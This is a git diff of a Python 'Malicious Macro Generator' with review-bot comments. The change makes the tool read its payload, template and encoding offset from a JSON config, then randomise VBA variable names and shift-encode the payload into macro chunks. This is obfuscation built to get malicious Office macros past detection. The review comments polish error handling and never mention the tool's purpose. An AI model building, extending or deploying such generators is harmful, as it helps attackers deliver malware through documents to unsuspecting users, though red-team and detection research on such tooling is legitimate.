diff --git a/GenMacro.py b/GenMacro.py
index 042666b..cf71dd5 100644
--- a/GenMacro.py
+++ b/GenMacro.py
@@ -3,40 +3,75 @@ import random import string import os import re +import json + +def load_config(filename): + config = load_data(filename) + items = {} + try: + items = json.loads(config) + except: + print "[-] \"%s\" is not a valid config file." % filename + exit(0) + return items + +def get_config(config, key): + if config.has_key(key): + return config[key] + else: + print "[-] \"%s\" not found in the config file." % key + exit(0) + +def get_config_vars(config): + vars =get_config(config, "encodedvars") + return vars + +def show_description(config): + description = get_config(config, "description") + print "[*] Payload: %s" % description def gen_var(size): return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size)) def gen_int(size): return ''.join(random.SystemRandom().choice(string.digits) for _ in range(size)) + +def randomize_vars(buffer, vars, iter): + for var in vars: + for i in reversed(range(1, iter)): + buffer = buffer.replace(var + str(i), gen_var(random.randrange(5, 20))) + return buffer + +def randomize_int(buffer, var, min, max, iter): + for i in reversed(range(1, iter)): + buffer = buffer.replace("[" + var + str(i) + "]", gen_int(random.randrange(min, max))) + return buffer def encode_data(buffer, offset): data = "" for c in buffer: - data += chr(ord(c) + int(sys.argv[3])) + data += chr(ord(c) + int(offset)) return data -def randomize_vars(buffer, vars): - for var in vars: - for i in reversed(range(1, 40)): - buffer = buffer.replace(var + str(i), gen_var(random.randrange(5, 20))) +def encode_config_vars(buffer, vars, offset): + for var in vars.keys(): + buffer = replace_var_encode(buffer, var, vars[var], offset) return buffer - -def randomize_int(buffer): - for i in reversed(range(1, 40)): - buffer = buffer.replace("[int" + str(i) + "]", gen_int(random.randrange(3, 5))) + +def replace_var_encode(buffer, var, data, offset): + encoded = encode_data(data, offset) + buffer = buffer.replace("[" + 
var + "]", encoded) return buffer - -def encode_domain(buffer, domain, offset): - domain = encode_data(domain, offset) - buffer = buffer.replace("[DOMAIN]", domain) + +def replace_var(buffer, var, data): + buffer = buffer.replace("[" + var + "]", str(data)) return buffer def gen_chunk(buffer, payload, offset): payload = encode_data(payload, offset) vars = "Dim " + gen_var(random.randrange(5, 20)) + " As String\r\n" args = "" - size = 0 + size = 0 for item in re.findall("." * 200, payload): current_var = gen_var(random.randrange(5, 20)) @@ -61,7 +96,7 @@ def load_data(filename): buffer = open(filename, "rb").read() return buffer else: - print "[-] \"%s\"File not found." % filename + print "[-] \"%s\" file not found." % filename exit(0) def save_macro(filename, buffer): 
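Review bot: The bare `except:` in `load_config` also traps `KeyboardInterrupt` and `SystemExit` and hides the real parser error; `json.loads` raises `ValueError` on malformed input, so `except ValueError:` is the narrower clause. Both `load_config` and `get_config` then call `exit(0)`, which reports success to the calling shell on a failed run; `sys.exit(1)` would let a wrapper script detect the failure (`sys` appears to be imported above the hunk, since `sys.argv` is used). `get_config` assumes the parsed JSON is an object: a config whose top level is a list or string makes `config.has_key(key)` raise `AttributeError`, and `key in config` is the portable spelling of that test. The new parameters named `buffer`, `vars`, `iter`, `min` and `max` shadow builtins inside `randomize_vars` and `randomize_int`, which makes those bodies harder to read.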
@@ -73,32 +108,41 @@ def save_macro(filename, buffer): print "[*] Saving \"%s\" as the final macro" % filename def banner(): - print "MaliciousMacroGenerator V1.0 - charles.hamilton@mandiant.com RingZer0 Team" + print "Malicious Macro Generator V1.1 - RingZer0 Team\nAuthor: Mr.Un1k0d3r charles.hamilton@mandiant.com\n" def help(): - print "Usage: %s [template] [domain] [offset] [payload] [output]\n\n\ttemplate\tTemplate macro\n\tdomain\t\tTarget domain name (USERDOMAIN env variable value)\n\toffset\t\tEncoding offset (default 3)\n\tpayload\t\tPayload to be executed\n\toutput\t\tOutput filename" % sys.argv[0] + print "Usage: %s [config] [output]\n\n\tconfig\tConfig file that contain generator information\n\toutput\t\tOutput filename for the macro" % sys.argv[0] if __name__ == "__main__": + config = "" data = "" + iter = 0 vars = ["var", "func", "data", "cond", "int"] offset = 0 domain = "" banner() - if len(sys.argv) < 6: + if len(sys.argv) < 3: help() exit(0) - offset = int(sys.argv[3]) - domain = sys.argv[2] + config = load_config(sys.argv[1]) + show_description(config) + offset = int(get_config(config, "encodingoffset")) + data = load_data(get_config(config, "template")) + iter = int(get_config(config, "varcount")) + data = replace_var(data, "OFFSET", offset) - data = load_data(sys.argv[1]) - data = randomize_int(data) - data = randomize_vars(data, vars) - data = encode_domain(data, domain, offset) - data = gen_chunk(data, sys.argv[4], offset) + data = randomize_int(data, "SMALLINT", 1, 2, iter) + data = randomize_int(data, "INT", 2, 5, iter) + data = randomize_vars(data, vars, iter) - save_macro(sys.argv[5], data) + template_vars = get_config_vars(config) + data = encode_config_vars(data, template_vars, offset) - print "[*] Completed" \ No newline at end of file + data = gen_chunk(data, get_config(config, "payload"), offset) + + save_macro(sys.argv[2], data) + + print "[*] Macro generation is completed"
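Review bot: In the `__main__` block, `int(get_config(config, "encodingoffset"))` and `int(get_config(config, "varcount"))` raise an unhandled `ValueError` or `TypeError` when the config holds a non-numeric value, so the user gets a traceback instead of the `[-]` message style used by `get_config`. Wrapping the two conversions in `try:` / `except (ValueError, TypeError):` with a message naming the malformed key and a non-zero exit would keep error reporting consistent. The context line `domain = ""` is now dead, because this commit removes both `domain = sys.argv[2]` and the `encode_domain` call. The initialisers `config = ""` and `iter = 0` are overwritten before use, and `iter` shadows a builtin. The help text reads "Config file that contain generator information", where "contains" is meant.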